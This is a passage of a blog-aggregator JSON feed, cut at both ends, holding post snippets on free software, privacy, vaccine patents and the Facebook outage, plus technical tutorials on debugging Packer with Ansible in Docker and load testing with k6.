someone which excludes others from making or selling an “invention” ) and pharma companies other than companies who hold the patent on the vaccine cannot produce the vaccine.\nWhen Oxford planned to allow all companies to manufacture its Covid vaccine, Bill Gates convinced them to cancel this plan. Another article. This is because Bill Gates prioritizes his profit over people’s health.\nNext, Bill Gates came up with a scheme named Covax which, instead of removing the artificial restrictions from the vaccine and allowing independent companies to develop the vaccine, plans to charge high amount of money to wealthy countries and then donate the vaccine using to poor countries.\nCompanies participating in Covax will be able to set their own prices, without any transparency and accountability. They won’t have to face any legal liability for any potential damages caused by the vaccine made by them. This is what companies want– to earn as much as possible without any transparency and accountability of their actions.\nSo, basically, what is going on is that the taxpayers of rich countries are paying for higher prices set by pharma companies so that they can donate the vaccines to low-income countries rather than allow local manufacturers in poor countries to develop their own vaccine. The vaccine distribution could have been better in low-income countries if the local manufacturers were allowed to develop the vaccine. Poor countries are doomed to suffer because of the greed of corporates. Here is a good article explaining how patents are a barrier to vaccine distribution. Additionally, this scheme would also affect rich countries’ economies.\n Source:  The Economist Intelligence Unit \n\nIn fact, executive of one vaccine manufactuer said there would be a chance for them to raise prices for the vaccine when COVID moves from a pandemic state to an endemic situation and the virus circulates continually in pockets around the globe. When everyone is safe, the Covid will be over. Instead the company wants the opposite, so that the virus spreads and they can earn more profit.\nThe scenario is not special to Covid vaccine. Billionaires like Bill Gates have a large influence on public health policies. The root of the problem is capitalism– profit over people or in other words, the system which incentivizes greed over everything else. It is a customary practice for rich to invent schemes like this to remain rich at the expense on others. No surprise that they wouldn’t treat Covid vaccine any different.\n Articles for further reading:\n\n\nHow Bill Gates Impeded Global Access to Covid Vaccines\nHow Pfizer Silences World Governments in Vaccine Negotiations\nThe article mentions:\nPfizer silences governments through the use of nondisclosure provisions in many of its contracts. Brazil, for example, is prohibited from making “any public announcement concerning the existence… or terms” of the contract or commenting on its relationship with Pfizer without Pfizer’s prior written consent.\nPfizer can disallow governments from accepting additional donations of the Pfizer vaccine.\nPfizer exempts itself from liability for patent infringements, shifting the financial risk of Pfizer’s actions to government purchasers – despite Pfizer’s opposition to similar exemptions for manufacturers proposed at the World Trade Organization.\nIt gives the power to secret private arbitrators, not public courts, to decide issues on contract disputes.\nPfizer requires some countries to waive sovereign immunity, so it can go after state assets in case of a dispute.\nPfizer gives itself sole power when it comes to making key decisions, including how vaccine deliveries will be prioritized if there is a supply shortage.\nAnother article for more information.\nPressuring low-income countries.\nModerna not sharing its technology stopping the poorest nations to produce the shot themselves.",[],{"slug":1864,"title":1865,"link":1866,"pubDate":1867,"contentSnippet":1868,"tags":1869,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"whoogle-1","Whoogle: A privacy friendly search engine","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fwhoogle-1\u002F","Fri, 26 Nov 2021 15:12:24 +0530","What is whoogle ? Whoogle is a privacy friendly (meta) search engine. It uses google for it’s data but without any ads, javascript, AMP links, cookies, or IP address tracking. It’s Free and opensource software.\nWhy use whoogle? If you didn’t knew, a great chunk of google’s revenue comes from ads and tracking. They use their services to gather user’s private data and use it for their own benefit, privacy is extremely important.",[],{"slug":1871,"title":1872,"link":1873,"pubDate":1874,"contentSnippet":1875,"tags":1876,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"on-powered-by-ai-marketing","On \"Powered by AI \u002F ML\" marketing","https:\u002F\u002Fnadh.in\u002Fblog\u002Fon-powered-by-ai-marketing\u002F","Fri, 26 Nov 2021 00:00:00 +0000","An email I had sent in response to a survey on the use of “AI \u002F ML” and the “AI-first mindset” in our organisation and in the industry was shared on social media[1] [2] sparking surprising amounts of interest. I did candidly state the simple fact that we haven’t come across any big problems that warrant any specific “AI \u002F ML” solutions in our organisation yet (Zerodha - stock broker that offers online investment and trading platforms), and that the bulk of the “powered by AI” claims we have seen across industries and in the numerous startup pitches that we receive, have been cases of hollow marketing. There is also a general expectation (delusion) that any sufficiently large technology company should be using “AI \u002F ML” somehow, somewhere, for some reason.",[],{"slug":1878,"title":1879,"link":1880,"pubDate":1881,"contentSnippet":1882,"tags":1883,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"free-software-explained-simply","Free Software Explained Simply","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffree-software-explained-simply\u002F","Thu, 25 Nov 2021 00:00:00 +0000","The article was updated on 03 December 2021 to illustrate what source code means.\nLet’s say your refrigerator has some problem, and it stopped working. You don’t know how to repair it. There is a repair shop in your town. The components of the refrigerator are sealed and there are no components available in the market. Every company makes their own components which are not compatible with other company’s refrigerators. That means you need to go to the same company to get it repaired, even though the mechanic in the shop near your house could have repaired it if it was not intentionally locked by the manufacturer. Unfortunately, it is weekend and the company services are not available on weekends.\nThen you book an appointment on Monday and wait for a few days for your turn. When your turn comes, the company takes the refrigerator and “diagnoses” it for a few days. Then it returns you a call saying that it will take ₹ 50,000 to repair it, and you can get a brand-new refrigerator for ₹ 60,000. So, you got frustrated and buy a new refrigerator.\nThe story tells us the importance of freedom that we enjoy in our daily life. In the above story, if you had the freedom to see what’s inside your device. But it didn’t happen just because of the company making it intentionally locked and making sure that only they can repair all the products they sell.\nThink of the same scenario in software. Let’s say you found a problem in the software you are working on. You are not a programmer, but other people who know programming can fix that problem. Every software is made of some human-readable code, which we call source code, which is then compiled by the computer. A software receives instructions from the code, and it does whatever the source code commands it to. You realized that the code on which the software is working is not available to you by the developer of that software. This leaves other programmers, except for the developer, in no position to fix the problem or even inspect what is wrong with the software. Similar to the refrigerator story above, the software source code is intentionally kept a secret from you and due to that restriction, you cannot get the problem fixed.\nYou try to contact the developer and report the problem, but there is no response. Now you try to switch to some other software, but then those software lacks some other crucial features which the previous one had. Now you are thinking that if you had the code, then there was a possibility to fix that problem. In this situation, you have to wait for the developer to fix the problem or use some other software or make your own and that too from scratch just to fix a problem, which would have surely been less hassle than to write the software from scratch.\nAlso, as we discussed earlier, a software takes commands from the source code. That means, whoever has the source code, has the full control over that software. If the user does not have the source code, then the user does not control the software.\nWhat is source code?\nWell, what is source code? To illustrate, I would like to show you a simple code. Don’t worry if you do not understand the code. I am only showing it to make my point.\nSee the following HTML code:\n\t\u003C!DOCTYPE html>\n\n\t\u003Chtml>\n\n\t\u003Cbody>\n\n\t\u003Ch1 style=\"color:Red;\">Hello World\u003C\u002Fh1>\n\n\t\u003Cp style=\"color:Blue;\">I am Ravi\u003C\u002Fp>\n\n\t\u003Cp style=\"color:Purple;\">What color is this text?\u003C\u002Fp>\n\n\t\u003C\u002Fbody>\n\n\t\u003C\u002Fhtml>\n\nWhen I write these lines in a text editor, save this file as test.html and open test.html in a browser, it looks like the following image:\n\t\u003C!DOCTYPE html>\n\n\t\u003Chtml>\n\n\t\u003Cbody>\n\n\t\u003Ch1 style=\"color:Green;\">Hello World\u003C\u002Fh1>\n\n\t\u003Cp style=\"color:Blue;\">I am Ravi\u003C\u002Fp>\n\n\t\u003Cp style=\"color:Purple;\">What color is this text?\u003C\u002Fp>\n\n\t\u003C\u002Fbody>\n\n\t\u003C\u002Fhtml>\n\nNow, if I change the color from Red to Green in the heading of the code above, save the file and open in the browser again. The heading becomes green in color.\nSee the below screenshot for this code:\nNotice how change in code changes the color of the heading in the screenshots. You can do all sort of changes in the code and make the text whatever you like. Try copying the code in a text editor and save it as filename.html, where you can replace ‘filename’ by any name of your choice, and make changes in the text or color to play around and see it for yourself.\nThe conclusion here is: The person\u002Fentity having source code of the software controls the software. For example, Microsoft has the source code of Microsoft Windows and therefore the software is in the control of Microsoft. The source code of Whatspp is with Facebook, so Facebook controls it. Users do not control the software if they do not have the source code.\nDefining Free Software\nWith the above discussion, I wanted to illustrate that you cannot repair a software if you do not have the source code. You do not control the software if you do not have the source code. So, the user must have the source code so that they can inspect and modify it according to their needs. In the above example, if the source code were available with you, then you also require the freedom to share the software with people who know programming. It is analogous to you showing the refrigerator to a mechanic in the above example so that they can repair it.\nNow let’s say you have the source code of a software and the freedom to share it with others. There is a problem in that program you would like to fix. Someone who knows how to fix the problem, will modify the source code and give you their modified version so that your problem gets solved.\nWhen the software guarantees all the above-mentioned freedoms and, in addition, the freedom to run the software for any purpose, we call it Free Software. Free Software is a matter of liberty, not price. So ‘Free’ in ‘Free Software’ means freedom and not price. It is also called Libre Software or Swatantra Software or Mukt Software to emphasize that it is about freedom and not price. Think of free as in free speech not as in free meal.\nThe following poster gives the definition of Free Software:\n\n\nCredits: Jeison Yehuda Amihud\n\nSource: https:\u002F\u002Fwww.gnu.org\u002Fgraphics\u002Famihud-4-freedoms.html\n\nLICENSE: CC-BY-SA 4.0\n \n\nExamples of Free Software\nCheck my Free Software List for some examples of Free Software.\nAn example is Scribus, which is a desktop publishing software used in publishing newspapers, magazines etc. Scribus only supported publishing in Latin languages. Oman government funded adding a feature to Scribus, due to which Arabic support was added. Due to this, Scribus got Malayalam support and many newspapers now use Scribus to publish. The full story is here. It goes to show the value of freedom. Scribus is free software, which means it respects all the four freedoms mentioned in the poster. Source code being available, developers could add a feature and then used freedom 3 to share the modifications with others so that everyone, including nonprogrammers, benefitted from this.\nAnother example is a free software named GNUKhata. Its development is funded by the Kerala government. Due to the freedom given by Free Software, GNUKhata is customizable. Due to its customizability, it now supports many Indian languages and many features like GST-compliance were added. Since many proprietary software for accounting are very costly and cannot be bought but can only be used against a license fee paid annually or periodically, many small businesses cannot afford them. GNUKhata can be downloaded for free-of-cost and users, businesses do not have to pay any license fee or ask for permission to use it.\nThink of what the world would have been without Free Software. What would have happened if there was no Free Software in the above mentioned examples.\nCredits: Thanks for Ravish, Praveen and Snehal for reviewing the article and giving suggestions.",[],{"slug":1885,"title":1886,"link":1887,"pubDate":1881,"contentSnippet":1888,"tags":1889,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"what-does-facebook-outage-teach-us","What Does The Facebook Outage Teach Us","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fwhat-does-facebook-outage-teach-us\u002F","On the 4th of October 2021, Facebook, Instagram, WhatsApp were down for more than 6 hours. This had a huge impact on many of its users, with devastating effect to many. During the outage, many users flocked to Twitter, Discord, Signal, and Telegram, resulting in disruptions on these apps’ servers.\nMany businesses, which rely on Facebook’s services for their business, were down. In many countries, Facebook is synonymous with the internet and therefore their communications, business, payments, humanitarian work got disrupted. The outage temporarily broke the ability for some Facebook employees to access company buildings and conference rooms with their badges. And every third-party site that relies on “log in with Facebook” didn’t work as well.\nWhat does this teach us? That Facebook’s services are centralized (they are controlled by a single entity). They are the single point of failure and control. A single company like Facebook controlling a large part of communications is no different from a dictator. You are at a mercy of them.\nThis tells us that the whole world relying on a single company for all their communications, businesses etc. is not sustainable.\nIn addition, such a service can be sold to any other company, like WhatsApp was sold to Facebook. So, even if the service is good today, it can become bad in the future– like, by selling it to another company or by changing privacy policy. Also, it is easier for governments to ban such a service.\nFacebook is so bad for many reasons that my advice to you is to delete your Facebook account.\nNow, what can we do about it?\nI do not use or be user by any centralized service, be it Signal, Twitter, Telegram. I use decentralized and federated services. Email is an example of federation. A @gmail.com user can write mails to @yahoo.com user and vice-versa. This gives a choice of service providers, and therefore the entire communication systems of the world do not depend entirely on one service. If one service goes down, then this won’t disrupt the communications of the whole world.\nExamples of decentralized networks are : Jitsi Meet(a video-calling software), Searx search engine etc. They can be self-hosted by anyone in their server. This gives users a choice of service providers.\nExamples of federated networks are: Fediverse, XMPP, Matrix etc.\nXMPP is a chat protocol. There are many services which a user can register with and still talk to another XMPP user who is registered on another XMPP service. This choice of service providers ensures that users are not locked into a single provider.\nTo get started with XMPP, you can use Quicksy on Android, whose onboarding process is similar to WhatsApp and Telegram. However, Quicksy users can talk to users registered on other XMPP providers, and so they are not locked-in to the service. If one service on XMPP shuts down or changes their policy, users can switch to other provider without going to the trouble of convincing every contact to switch to a new service. Compare this with WhatsApp, Signal, Telegram. If they change their policy or you disagree with these providers in future, you need to convince every contact to switch to that new service.\nThe bottom line is that Facebook’s outage is a reminder that they are a single point of failure, and other centralized services are no different in this aspect. Switch to decentralized and federated services instead, rather than being locked into a single provider for all your needs.",[],{"slug":1891,"title":1892,"link":1893,"pubDate":1894,"contentSnippet":1895,"tags":1896,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"scribus","Scribus: When Freedom-Respecting Software Saved The Day","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fscribus\u002F","Wed, 24 Nov 2021 00:00:00 +0000","Janayugom is a newspaper in Kerala, India, which publishes news in Malayalam language. Earlier they were using Adobe Pagemaker for publishing which supported only ASCII encoding. They considered using a better software for publishing in Malayalam. Many suggested them to try Adobe InDesign, but they realized that they need to pay a hefty subscription fee, which they could not afford. They came across community members of FSCI (Free Software Community of India), who suggested them to use Scribus for their publishing work. They don’t have to pay for any subscription fee to use it. Plus it supports Malayalam.\nThe developers of Scribus only added support for Latin languages, like English, Spanish, etc. Oman government funded adding support for Non-Latin languages in Scribus with Complex Text Layout feature, because they wanted support for Arabic language. This made is possible to add Malayalam support to Scribus.\nThis was done independent of the developers of Scribus. It is because Scribus is Free Software (free as in freedom, not price), which means anyone can adapt Scribus according to their needs. Such a thing is not possible with those Adobe software as they are proprietary and only developers can make changes.\nWhat will you do if the developer of a proprietary software does not care about the feature you want to add? Maybe the developers don’t care about supporting your language. In the case of Free Software, such changes are possible, independent of developers’ wish. Further, the funded project by the Oman government helped people in India to publish in their language. It is because users get freedom to share the modified versions of Free Software. And thus, any addition of feature helps the whole society.",[],{"slug":1898,"title":1899,"link":1900,"pubDate":1901,"contentSnippet":1902,"tags":1903,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"the-importance-of-communities","The Importance of Communities","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fthe-importance-of-communities\u002F","Sun, 21 Nov 2021 00:00:00 +0000","Wikipedia defines ‘Community’ as:\nA community is a social unit (a group of living things) with commonality such as norms, religion, values, customs, or identity.\nCommunities can be of many types and they might exist for different set of goals. In this post, I will share my experience with the free software commmunity that I am part of and its importance in my life. The topic has been touched in this blog post by FSCI earlier. The point was that communities can self-host and maintain free software powered services for the benefit of all because every individual self-hosting their services is not possible(for, say, people who do not know how to do) and not sustainable. Therefore, people can collaborate and run services.\nThat aspect is very important and that helps me greatly in my use of free software. In this post, I will touch on another aspect of the importance of communities, that is– the psychological boost that we get by being in a group which shares our goals. I continually say that I use only free software for my computing. But how is that possible in the era where proprietary software dominates? First comes my realization that software must respect user’s freedom. Then, my willpower to use only free\u002Fswatantra software. Then I also rely on the aspect touched earlier in the post about community-run services. I use community-run services(like the ones by FSCI) for my daily use. Abhas’ services helped me largely too. But one of the most important aspects is: that I am a part of the community which has a goal of promoting freedom-respecting software and full of people who understand the value of privacy. I think that if I was doing it all alone, I would probably would have been demotivated. I don’t know if I were able to keep it up. I keep getting demotivated but when I see that I am not alone in this activism, it definitely helps. Then I have friends from Free Software Communities outside of FSCI too. Many of them I know from Mastodon.\nAlso, I like how our community is inclusive and welcoming to all. Plus, it is nonhierarchial too. This aspect has made me hate hierarhical and centralized social structures as well(more on this later ;) ). We are also working on increasing the diversity in the community too. I hope that that people from all backgrounds (and not only privileged) get benefit and freedom that freedom-respecting software provides to the user.\nI wanna thank you all for making this possible :)\nSimilar read: Arun Mathai also has a post on why he likes communities.",[],{"slug":1905,"title":1906,"link":1907,"pubDate":1908,"contentSnippet":1909,"tags":1910,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"upload-on-wikimedia","Contribute to Wikimedia Commons","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fupload-on-wikimedia\u002F","Wed, 17 Nov 2021 00:00:00 +0000","If you have an image or a photo that you have taken which is useful for informative purposes, you can upload them to Wikimedia Commons.\nAll users of files found on Wikimedia Commons must be given the Four Freedoms:\nThe freedom to use the media.\nThe freedom to study the media and use information gained from it.\nThe freedom to make and distribute copies of the media.\nThe freedom to make changes to the media and distribute derived versions.\nI publish my images under a copyleft license, which means if you remix, transform, or build upon the material, you must distribute your contributions under the same license as the original, thus protecting every user’s (whoever uses that image) freedom. One such license is CC-BY-SA 4.0.\nYou can upload your images to Wikimedia Commons as well. Whenever you have some photo you shot and want to contribute it to public so that others can use it in their work, upload it to Wikimedia Commons.\nA federated and decentralized version of image sharing Wikimedia Commons would be good. Currently it is centralized and all the images are on one server. We can store these images at many places to avoid single point of failure.\nThanks to sahilister, who suggested me to upload there.",[],{"slug":1912,"title":1913,"link":1914,"pubDate":1915,"contentSnippet":1916,"tags":1917,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"debugging-packer-ci","Debugging issues with Packer and Ansible in Docker","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fdebugging-packer-ci\u002F","2021-11-15T18:30:00.000Z","Today I faced an issue that questioned my sanity. Since I didn’t find many “related” issues on StackOverflow\u002FGoogle-fu except a lone GitHub thread where a kind stranger hinted at what could be the issue, I am writing about it here in the hopes (although I don’t wish this torture on anyone) that it helps someone!\nTo give some context, I am running a Gitlab CI job that bakes an AMI using Packer. Packer can use different kinds of provisioners to do configure stuff on the host and then prepare the image. I am using Ansible provisioner to install and configure Consul. At this point you may think this post is sponsored by Hashicorp by the sheer mention of all their products, but I assure you that is not the case.\nAnyway, so this role works locally but it fails on the damn Gitlab CI. Classic case of Works on my machine, Ops problem now. These kinds of issues although are particularly exciting for me because they give me a chance to dig down deeper in the internals and slowly peel apart layers to figure out where the “drift” between local and CI is happening.\nHere’s the relevant Packer snippet (Oh and this week as I updated myself with new Packer releases, it’s now possible to write Packer config with HCL and not just JSON anymore! Yayie. Again a reminder: not a sponsored post).\nbuild {\n  sources = [\"source.amazon-ebs.golden-ami\"]\n  provisioner \"ansible\" {\n    playbook_file           = \"${var.playbook_file}\"\n    extra_arguments         = [\"--tags\", \"install\", \"-e\", \"ansible_python_interpreter=\u002Fusr\u002Fbin\u002Fpython3\"]\n    ansible_env_vars        = [\"ANSIBLE_LOCAL_TEMP=$HOME\u002F.ansible\u002Ftmp\", \"ANSIBLE_REMOTE_TEMP=$HOME\u002F.ansible\u002Ftmp\"]\n    galaxy_file             = \"${var.galaxy_file}\"\n    inventory_file_template = \"[consul_instances]\\n{{ .HostAlias }} ansible_host={{ .Host }} ansible_user={{ .User }} ansible_port={{ .Port }}\\n\"\n  }\n}\nRunning packer build in CI results in a failure of a task defined in the Ansible playbook. The task simply creates a new group:\n- name: Add Consul group\n  group:\n    name: \"{{ consul_group }}\"\n    state: present\n  when:\n    - consul_manage_group | bool\ngroup runs groupapp command behind the scenes and you should be in the list of sudoers to actually create new groups. Since I already have become: true and become_user: root in my playbook that requirement is fulfilled. Moreover, this task runs just fine in the local as I mentioned above. While running in CI, I see the following error:\namazon-ebs.golden-ami: TASK [consul : Add Consul group] ***********************************************\namazon-ebs.golden-ami: fatal: [default]: FAILED! => {\"changed\": false, \"msg\": \"groupadd: Permission denied.\\ngroupadd: cannot lock \u002Fetc\u002Fgroup; try again later.\\n\", \"name\": \"consul\"}\nErhm, okayyy. That looks like a permission error. But why does this not happen in my local was the question eating me up.\nNow was the time to start from the ground up and dissect different things going here. I will add a small hint though: The Gitlab CI runner is a Docker-based runner. That means all the commands like packer build etc happen inside a Docker container. I am using hashicorp\u002Fpacker:light image, which is an Alpine based image containing just the packer executable.\nI tried to run the container locally with:\ndocker run -v `pwd`:\u002Fapp --rm -it --entrypoint='' hashicorp\u002Fpacker:light sh\nAnd yes. When I ran packer build, I could replicate the issue here! But wait. More questions than answers. Ansible would run this groupadd command on the remote host, right? Why does Ansible care if it’s inside a container or not? So, I created a really simple playbook to reproduce this further.\n- name: Assemble Consul cluster\n  hosts: localhost\n  any_errors_fatal: true\n  become: true\n  become_user: root\n  tasks:\n    - name: Add Consul group\n      group:\n        name: debug_consul\n        state: present\nI ran this ansible-playbook test.yml inside the container and… it worked! Okay, now it’s becoming clear. We aren’t executing ansible-playbook directly, it’s being wrapped by Packer. So this is clearly getting messed up by Packer. This time I did find a GitHub issue where people were asking about similar issues and this person described it well:\n\nI opened Packer docs again and that’s when I read this:\nWe recommend against running Packer as root; if you do then you won’t be able to successfully run your Ansible playbook as root; become: yes will fail.\nWTF!!! This was right there in the docs, hiding in plain sight. Sheesh!\nOkay, so I can not run my playbook with become: true with the packer Image (which uses root user). Time to fix that by building a custom image. That is because Gitlab CI won’t let me change the user without hacking stuff. And a custom image also allows me to ditch Alpine for Ubuntu, which is what I prefer.\nFROM ubuntu:latest\n\nRUN apt-get update && apt-get install -y \\\n    python3 \\\n    git \\\n    curl \\\n    unzip \\\n    python3-pip \\\n    && rm -rf \u002Fvar\u002Flib\u002Fapt\u002Flists\u002F*\n\nRUN curl -o packer.zip https:\u002F\u002Freleases.hashicorp.com\u002Fpacker\u002F1.7.8\u002Fpacker_1.7.8_linux_amd64.zip\nRUN unzip packer.zip\nRUN mv packer \u002Fusr\u002Flocal\u002Fbin\n\nRUN pip3 install ansible\n\nRUN useradd -rm -d \u002Fhome\u002Fubuntu -s \u002Fbin\u002Fbash -g root -G sudo -u 1000 ubuntu\nUSER ubuntu\n\nWORKDIR \u002Ftmp\n\nENV PATH=\"$HOME\u002F.local\u002Fbin:$PATH\"\n\nWORKDIR \u002Fapp\nUsing this custom image, the packer build worked just fine. Fun day indeed (\u002Fs).\nFin!",[],{"slug":1919,"title":1920,"link":1921,"pubDate":1922,"contentSnippet":1923,"tags":1924,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-43","Systems, Scale, Value","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fsystems-scale-value\u002Findex.html","Sat, 13 Nov 2021 00:00:00 +0000","Creating things is a delicate endeavour, fraught with peril. People struggle forward through crazy marketplace and environmental complexities just to get from one day to the other. Yet I can't shake off the feeling that we make it harder for ourselves than it should be. I've been trying to work out why. There's a lot to unpack. This post is a start at thinking about it in public.",[723,1788,1346],{"slug":1926,"title":1927,"link":1928,"pubDate":1929,"contentSnippet":1930,"tags":1931,"maintainerName":56,"maintainerUsername":57,"maintainerPhoto":58,"feedUrl":59},"index-html-44","In the beginning, was the domain name","https:\u002F\u002Fwww.evalapply.org\u002Fposts\u002Fhello-world\u002Findex.html","Wed, 10 Nov 2021 00:00:00 +0000","How this blog came to be is a minor miracle. Long story short, I conned myself into believing nobody will find \u002Fand\u002F read it. But you're here, aren't you? And you're reading this. Aren't You? Confucamus. Well, here's how you got here.",[1932,457,54],"hello_world",{"slug":1934,"title":1935,"link":1936,"pubDate":1937,"contentSnippet":1938,"tags":1939,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"load-testing-k6","Load testing with K6","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fload-testing-k6\u002F","2021-10-28T18:30:00.000Z","This week I was occupied with optimising a Golang program I’d written at work. I wanted a way to reproduce the issue under heavy load on my development environment and Load Tests are a good way to do that.\nThe service in question is a RESTful API so it’s relatively easy to use any HTTP load test tools. The endpoint had an input parameter uuid which accepted a valid UUIDv4 as the input. To my surprise, this was not so straightforward with hey (which is my tool of choice for simple tests) and ab. While it was possible to write an external script to do that, I thought to look around at some “scriptable” alternatives. I found wrk which allowed me to write custom Lua modules. Now, I didn’t want to lose my focus from the main task which was load testing my service to write Lua, so I didn’t use wrk but it’s still a pretty decent option (and very very fast, at that).\nHello k6!#\n\nSome more Google-fu resulted in me finding k6. I’d never heard of this but after exploring the GitHub repo and the docs it looks like a pretty active project.\nSo, k6 basically allows you to write scriptable tests which allow you to test a variety of scenarios. The scripts are written in Javascript and treated as ES6 Modules for extensibility. k6 has a concept of Virtual Users to mimic a real-world user. Each VU runs the “script” in an isolated self-contained JS runtime using Goja. Now obviously at this point, if speed is your utmost concern to generate very heavy load tests, I guess wrk is your only real choice as invoking a JS runtime inside Go won’t be super fast. But for most use-cases and people, like my case, this will just be fine.\nBasic Usage#\nAnyway, I quickly grokked the docs and copy-pasted some examples and modified them to what I needed. I was able to run a basic load test running very quickly and admired the simplicity here. It generated some p90, p95 etc stats which were helpful to look at. Here’s a basic example of how the script looks:\nimport http from 'k6\u002Fhttp';\nimport { check, sleep } from 'k6';\nimport { Rate } from 'k6\u002Fmetrics';\nimport { uuidv4 } from \"https:\u002F\u002Fjslib.k6.io\u002Fk6-utils\u002F1.0.0\u002Findex.js\";\n\nexport const errorRate = new Rate('errors');\n\nexport default function () {\n  const url = 'https:\u002F\u002Fhttpbin.org\u002Fpost';\n  const params = {\n    headers: {\n      'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    },\n  };\n\n  const data = {\n    custname: \"hello\",\n    comments: uuidv4(),\n  };\n  check(http.post(url,data, params), {\n    'status is 200': (r) => r.status == 200,\n  }) || errorRate.add(1);\n\n  sleep(0.5);\n}\nTo run it:\nk6 run -d 10s -u 10 httpbin_load.js\n(Here -d is for the duration to run the test and -u is to specify Virtual User)\nExplanation:\nIt’s an HTTP POST request with some form data to https:\u002F\u002Fhttpbin.org\u002Fpost\nWe use the uuid function because the JS stdlib is great at providing basic helper methods (\u002Fs)\nWe define a check for HTTP status code as 200. Later we’ll see how to add more real-world checks under heavy load.\nWe have a sleep function to pause a little bit before each iteration. This is pretty important as leaving sleep is akin to a user pressing F5 on a browser non-stop and you’d probably not want your load tests to be that aggressive. Read docs for more info.\nOutput:\n❯ k6 run -d 30s -u 10 test.js                   \n\n          \u002F\\      |‾‾| \u002F‾‾\u002F   \u002F‾‾\u002F   \n     \u002F\\  \u002F  \\     |  |\u002F  \u002F   \u002F  \u002F    \n    \u002F  \\\u002F    \\    |     (   \u002F   ‾‾\\  \n   \u002F          \\   |  |\\  \\ |  (‾)  | \n  \u002F __________ \\  |__| \\__\\ \\_____\u002F .io\n\n  execution: local\n     script: test.js\n     output: -\n\n  scenarios: (100.00%) 1 scenario, 10 max VUs, 1m0s max duration (incl. graceful stop):\n           * default: 10 looping VUs for 30s (gracefulStop: 30s)\n\n\nrunning (0m30.6s), 00\u002F10 VUs, 387 complete and 0 interrupted iterations\ndefault ✓ [======================================] 10 VUs  30s\n\n     ✓ status is 200\n\n     checks.........................: 100.00% ✓ 387       ✗ 0   \n     data_received..................: 318 kB  10 kB\u002Fs\n     data_sent......................: 78 kB   2.5 kB\u002Fs\n     http_req_blocked...............: avg=28.65ms  min=210ns    med=857ns    max=1.1s     p(90)=1.49µs   p(95)=1.68µs  \n     http_req_connecting............: avg=7.77ms   min=0s       med=0s       max=301.24ms p(90)=0s       p(95)=0s      \n     http_req_duration..............: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n       { expected_response:true }...: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n     http_req_failed................: 0.00%   ✓ 0         ✗ 387 \n     http_req_receiving.............: avg=177.35µs min=39.43µs  med=170.18µs max=604.22µs p(90)=259.75µs p(95)=285.73µs\n     http_req_sending...............: avg=268.41µs min=48.62µs  med=216.61µs max=7.95ms   p(90)=334.94µs p(95)=448.21µs\n     http_req_tls_handshaking.......: avg=15.87ms  min=0s       med=0s       max=615.25ms p(90)=0s       p(95)=0s      \n     http_req_waiting...............: avg=253.61ms min=215.34ms med=230.77ms max=826.57ms p(90)=316.98ms p(95)=324.69ms\n     http_reqs......................: 387     12.666038\u002Fs\n     iteration_duration.............: avg=784ms    min=717ms    med=732.43ms max=1.92s    p(90)=820.35ms p(95)=926.87ms\n     iterations.....................: 387     12.666038\u002Fs\n     vus............................: 10      min=10      max=10\n     vus_max........................: 10      min=10      max=10\nThings to look for:\nFrom the above output, I think these 2 metrics are the most important to look at:\n     http_req_duration..............: avg=254.05ms min=215.63ms med=231.15ms max=826.99ms p(90)=317.33ms p(95)=325.1ms \n     http_reqs......................: 387     12.666038\u002Fs\nWe see the total requests sent in 30s were 387 and the p95 response time is 325.1ms.\nTesting some real-world scenarios#\nThis was a really simple example but we can add some more scenarios to mimic real-world checks. Let’s tweak the script to\nGo from 1 to 10 users in 10s.\nStay at 10 users for 5s.\nRamp down to 1 user for the next 15s.\nHave a threshold of not exceeding 500ms as p95.\nHave a threshold for the count of non 200 OK responses.\nThe above script now becomes:\nimport http from 'k6\u002Fhttp';\nimport { check, sleep } from 'k6';\nimport { Rate } from 'k6\u002Fmetrics';\nimport { uuidv4 } from \"https:\u002F\u002Fjslib.k6.io\u002Fk6-utils\u002F1.0.0\u002Findex.js\";\n\nexport const errorRate = new Rate('non_200_requests');\n\nexport let options = {\n    stages: [\n        \u002F\u002F Ramp-up from 1 to 10 VUs in 10s.\n        { duration: \"10s\", target: 10 },\n\n        \u002F\u002F Stay at rest on 10 VUs for 5s.\n        { duration: \"5s\", target: 10 },\n\n        \u002F\u002F Linearly ramp down from 10 to 0 VUs over the last 15s.\n        { duration: \"15s\", target: 0 }\n    ],\n    thresholds: {\n        \u002F\u002F We want the 95th percentile of all HTTP request durations to be less than 500ms\n        \"http_req_duration\": [\"p(95)\u003C500\"],\n        \u002F\u002F Thresholds based on the custom metric `non_200_requests`.\n        \"non_200_requests\": [\n            \u002F\u002F Global failure rate should be less than 1%.\n            \"rate\u003C0.01\",\n            \u002F\u002F Abort the test early if it climbs over 5%.\n            { threshold: \"rate\u003C=0.05\", abortOnFail: true },\n        ],\n    },\n};\n\nexport default function () {\n  const url = 'https:\u002F\u002Fhttpbin.org\u002Fpost';\n  const params = {\n    headers: {\n      'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    },\n  };\n\n  const data = {\n    custname: \"hello\",\n    comments: uuidv4(),\n  };\n  check(http.post(url,data, params), {\n    'status is 200': (r) => r.status == 200,\n  